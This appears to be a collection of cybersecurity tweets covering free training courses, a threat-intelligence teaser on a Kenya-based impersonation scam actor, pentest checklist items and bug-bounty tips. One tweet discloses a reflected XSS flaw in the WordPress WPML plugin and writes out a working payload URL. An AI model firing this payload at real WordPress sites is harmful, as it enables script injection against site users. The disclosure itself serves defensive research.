FREE Cybersecurity Education Courses from @PaloAltoNtwks
1️⃣ Introduction to Cybersecurity
2️⃣ Fund of Network Security
3️⃣Fund of Cloud Security
4️⃣Fund of SOC (Security Operations Center)
👉 How to Enroll
https://t.co/4KcHJgAyDy
New blog - Introducing GreenMwizi 🔍
🇰🇪 A Kenya-based adversary
🎭 Poses as @bookingcom
🗨️ Replies to targets with Twitter bots
📞 Calls victims using WhatsApp
💸 Uses intl. money transfer site @remitly
⏰ Active since at least Feb' 2023
https://t.co/gnK5jgJVqt
What are the MOST BASIC things you look for on a pentest FIRST?
I'll go first:
unprotected credentials on shares
SMB signing
LDAP signing
default credentials
no explicit credentials to access shares
CVEs
LLMNR/Netbios enabled
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
Found by :- @bug_vs_me and @falcon_charan on 13th MArch 2023
Nuclei template:- https://t.co/4ks7Xdunym
and payload:-
https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
Understanding and Preventing CSRF Attack
A Comprehensive Guide to Identifying, Mitigating and Protecting Your Website from Cross-Site Request Forgery
#bugbountytips#bugbounty
https://t.co/hNYdMoedsA
The methodology of collecting subdomains from tools like amass, subfinder, findomain and directly sending them to httpx/httprobe is absolutely wrong. Instead, you should DNS resolve them using tools like puredns or shuffledns.
#BugBounty#bugbountytips